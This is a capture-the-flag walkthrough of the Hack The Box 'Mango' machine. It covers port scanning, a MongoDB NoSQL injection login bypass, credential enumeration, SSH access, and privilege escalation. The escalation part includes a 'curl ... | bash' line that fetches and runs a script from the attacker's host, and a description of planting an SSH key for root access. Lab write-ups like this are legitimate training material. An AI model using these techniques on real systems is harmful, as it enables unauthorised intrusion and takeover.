Mango is a good linux based machine to improve your enumeration skills you might learn some new things from this.
nmap -sC -sV 10.10.10.162
Opening the host in our browser on port 80 we are presented with an 403 forbidden error so we tried opening the host on 443 and got this.
Now this looks like a search engine let’s check the source code
after looking at the source code we couldn’t find anything there
let’s check the nmap report again
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
Adding this to our
$ echo "10.10.10.162 staging-order.mango.htb" >> /etc/hosts
We can browse
Here we can see a login panel like this
After trying random credentials we got nothing.
Here mango could be a wordplay on mongoDB
mongoDB is a NoSQL database to exploit it we need to search mongoDB NoSQL.
To confirm this we went to this github repo and tried authentication bypass.
Basic authentication bypass using not equal ($ne) or greater ($gt)
In response we got
HTTP/1.1 302 Found
After searching about it we came across a github repository which can enumerate Usernames and passwords of NoSQL (MongoDB) injecion vulnerable web applications.
After running the script we have now 2 credentials
We can connect the user mango from SSH with the password we get earlier.
#ssh email@example.com firstname.lastname@example.org's password: Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64) Documentation: https://help.ubuntu.com Management: https://landscape.canonical.com Support: https://ubuntu.com/advantage System information as of Fri Apr 17 05:33:13 UTC 2020 System load: 0.12 Processes: 117 Usage of /: 25.9% of 19.56GB Users logged in: 1 Memory usage: 16% IP address for ens33: 10.10.10.162 Swap usage: 4% Canonical Livepatch is available for installation. Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 122 packages can be updated. 18 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Fri Apr 17 05:14:54 2020 from 10.10.15.51
we got the shell
Nothing is here on this user we can’t find any user flag checking the home folder to find the flag in other user we couldn’t get into it.
But we have an admin password let’s try to switch mango to admin with the password we got previously.
mango@mango:~$ su admin Password: $ whoami admin $ cat /home/admin/user.txt 79bf3[redacted]47e92
Now main part is to get root flag
To get an idea for privilege escalation we can run LinEnum here.
curl 10.10.15.51:80/LinEnum.sh | bash
reading the output of LinEnum we saw this line
We searched about this on google and saw this
We can print root.txt from this
We got the root flag but still we don’t have root shell but we can write our SSH public key to authorized_keys to get ssh access as root.
You can print root.txt or can get root shell by using -scripting flag.
To get shell you can use same method.
Here we got out root shell.
Hope you like it.